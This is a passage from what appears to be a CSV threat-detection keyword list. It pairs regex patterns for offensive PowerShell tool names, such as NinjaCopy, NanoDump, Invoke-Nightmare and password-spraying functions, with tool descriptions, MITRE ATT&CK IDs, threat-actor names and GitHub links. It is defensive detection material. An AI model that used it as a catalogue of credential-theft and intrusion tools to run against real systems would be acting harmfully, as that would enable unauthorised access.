FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16135.ps1*",".{0,1000}Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MSSQLup*",".{0,1000}Invoke\-MSSQLup.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NamedPipePermissionsCheck*",".{0,1000}Invoke\-NamedPipePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-NETMongoose*",".{0,1000}Invoke\-NETMongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NetworkAdaptersCheck*",".{0,1000}Invoke\-NetworkAdaptersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-NetworkRelay*",".{0,1000}Invoke\-NetworkRelay.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-NetworkRelay.ps1*",".{0,1000}Invoke\-NetworkRelay\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Nightmare -DLL *",".{0,1000}Invoke\-Nightmare\s\-DLL\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare -NewUser*",".{0,1000}Invoke\-Nightmare\s\-NewUser.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare*",".{0,1000}Invoke\-Nightmare.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-noPac.*",".{0,1000}Invoke\-noPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","59","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*Invoke-NTDS.ps1*",".{0,1000}Invoke\-NTDS\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NTLMAuth.ps1*",".{0,1000}Invoke\-NTLMAuth\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Ntsd.ps1*",".{0,1000}Invoke\-Ntsd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Obfuscation -ScriptPath *",".{0,1000}Invoke\-Obfuscation\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Invoke-Obfuscation*",".{0,1000}Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3517","748","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" "*Invoke-Obfuscation.psd1*",".{0,1000}Invoke\-Obfuscation\.psd1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Invoke-OpenInboxFinder*",".{0,1000}Invoke\-OpenInboxFinder.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-OpenOWAMailboxInBrowser*",".{0,1000}Invoke\-OpenOWAMailboxInBrowser.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Oxidresolver*",".{0,1000}Invoke\-Oxidresolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-P0wnedshell*",".{0,1000}Invoke\-P0wnedshell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-P0wnedshellx86*",".{0,1000}Invoke\-P0wnedshellx86.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-PacketKnock*",".{0,1000}Invoke\-PacketKnock.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Pandemonium -Command*",".{0,1000}Invoke\-Pandemonium\s\-Command.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Pandemonium.ps1*",".{0,1000}Invoke\-Pandemonium\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-PasswordSpray*",".{0,1000}Invoke\-PasswordSpray.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayEWS*",".{0,1000}Invoke\-PasswordSprayEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayGmail*",".{0,1000}Invoke\-PasswordSprayGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential 